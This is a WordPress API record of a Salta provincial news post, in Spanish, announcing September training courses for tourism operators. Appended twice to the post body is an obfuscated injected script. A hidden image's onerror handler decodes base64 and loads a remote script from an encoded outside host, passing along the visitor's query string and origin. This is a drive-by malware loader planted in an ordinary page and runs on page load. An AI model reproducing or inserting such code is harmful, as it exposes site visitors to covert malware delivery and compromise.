{"id":1421,"date":"2022-09-04T20:31:43","date_gmt":"2022-09-04T23:31:43","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1421"},"modified":"2025-08-14T00:36:33","modified_gmt":"2025-08-14T03:36:33","slug":"en-septiembre-continuan-los-cursos-de-capacitacion-destinados-a-operadores-turisticos","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1421","title":{"rendered":"En septiembre contin\u00faan los cursos de capacitaci\u00f3n destinados a operadores tur\u00edsticos"},"content":{"rendered":"\n<h4 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#604806\"><em>Los prestadores podr\u00e1n participar en cursos virtuales o presenciales registrando inscripci\u00f3n en www.turismotecapacita.com. \u00a0Ayer se realiz\u00f3 una capacitaci\u00f3n para operadores de Turismo Naturaleza.<\/em><\/h4>\n\n\n\n<p>Los cursos de capacitaci\u00f3n organizados por el Ministerio de Turismo y Deportes continuar\u00e1n en septiembre con una interesante propuesta para los diversos prestadores del sector, los interesados deben inscribirse en&nbsp;<a href=\"http:\/\/www.turismotecapacita.com\/\">http:\/\/www.turismotecapacita.com<\/a><\/p>\n\n\n\n<p>Los cursos iniciaron ayer en la ciudad de Salta con un curso presencial que brind\u00f3 el Ministerio de Turismo de la Naci\u00f3n sobre Aspectos Legales en Turismo Naturaleza dirigido a agentes de viaje, operadores, prestadores de Turismo Naturaleza y gestores de turismo municipal. Se analizaron aspectos jur\u00eddicos, se plantearon actuaciones ante accidentes y adem\u00e1s se present\u00f3 la web de la Ruta Natural.<\/p>\n\n\n\n<p>Previamente se realiz\u00f3 en la semana que finaliza la 1\u00b0 Mesa para el Gerenciamiento del Riesgo, para la mejora continua de las prestaciones tur\u00edsticas en el \u00e1mbito de la naturaleza. En esta primera reuni\u00f3n se trataron temas relacionados al desarrollo de la Gesti\u00f3n del Riesgo y Planes de Contingencia para Prestadores de Turismo Aventura, la construcci\u00f3n de protocolos adecuados para cada modalidad y su an\u00e1lisis pertinente de sus potenciales riesgos y c\u00f3mo mitigarlos.<\/p>\n\n\n\n<p>El cronograma de cursos contin\u00faa con Dise\u00f1o de Experiencias Tur\u00edstica que se desarrolla hasta hoy en San Carlos a cargo de&nbsp;<strong>Patricia Ruiz<\/strong>; en tanto, el lunes 5 y el martes 6, destinado a directivos de empresas o emprendimientos de escala mediana o peque\u00f1a se llevar\u00e1 a cabo la capacitaci\u00f3n presencial\/virtual sobre Escuela de Negocios. &nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/3986-en-septiembre-continuan-los-cursos-de-capacitacion-destinados-a-operadores-turisticos.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/3986-en-septiembre-continuan-los-cursos-de-capacitacion-destinados-a-operadores-turisticos.jpg\" alt=\"En septiembre contin\u00faan los cursos de capacitaci\u00f3n destinados a operadores tur\u00edsticos\"\/><\/a><\/figure>\n\n\n\n<p>Los Informantes de Turismo podr\u00e1n formarse, de manera virtual, sobre Claves para la Organizaci\u00f3n de Eventos y Normas b\u00e1sicas de Protocolo el lunes 5 y el lunes 19, la capacitaci\u00f3n estar\u00e1 a cargo de<strong>&nbsp;Marcela Ruiz<\/strong><\/p>\n\n\n\n<p>T\u00e9cnicas para el Desarrollo de una Cocina Local y Creativa. El Proceso Creativo Aplicado a los Productos ser\u00e1 el curso virtual que la Escuela de Gastronom\u00eda Salamanca dictar\u00e1 el lunes 19, por otra parte, el martes se dictar\u00e1 T\u00e9cnicas para el Desarrollo de una Cocina Local y Creativa. Ambientaci\u00f3n de los Espacios, ambos cursos est\u00e1n destinados a Prestadores Gastron\u00f3micos del Programa Sabores del Valle de Lerma y de los Valles Calchaqu\u00edes.<\/p>\n\n\n\n<p>Desde el lunes 19 s\u00e1bado 24&nbsp;<strong>Patricia Ruiz&nbsp;<\/strong>estar\u00e1 a cargo en &nbsp;San Carlos del curso Dise\u00f1o de Experiencias Tur\u00edsticas, m\u00f3dulos 3, 4 y 5; en tanto, Rodolfo Pastore dictar\u00e1 el viernes 23 Primeros Auxilios en Coronel Moldes.<\/p>\n\n\n\n<p>El mes finaliza con los cursos de El Informante Tur\u00edstico como Comunicador\/ a Efectivo que de manera virtual dictar\u00e1 Andrea Goldfeder de modo virtual el jueves 29 a Informantes Tur\u00edsticos. Por \u00faltimo,&nbsp;<strong>Rodolfo Pastore<\/strong>&nbsp;abordar\u00e1 conceptos de Primeros Auxilios en Tartagal y en Aguaray, ambos cursos son presenciales y se realizar\u00e1n el jueves 29 y el viernes 30, respectivamente.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Los prestadores podr\u00e1n participar en cursos virtuales o presenciales registrando inscripci\u00f3n en www.turismotecapacita.com. \u00a0Ayer se realiz\u00f3 una capacitaci\u00f3n para operadores de Turismo Naturaleza. Los cursos de capacitaci\u00f3n organizados por el Ministerio de Turismo y Deportes continuar\u00e1n en septiembre con una interesante propuesta para los diversos prestadores del sector, los interesados deben inscribirse en&nbsp;http:\/\/www.turismotecapacita.com Los cursos [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1422,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,15],"tags":[],"class_list":{"0":"post-1421","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-provincial"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1421"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1421"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1421\/revisions"}],"predecessor-version":[{"id":7366,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1421\/revisions\/7366"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1422"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1421"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1421"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1421"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}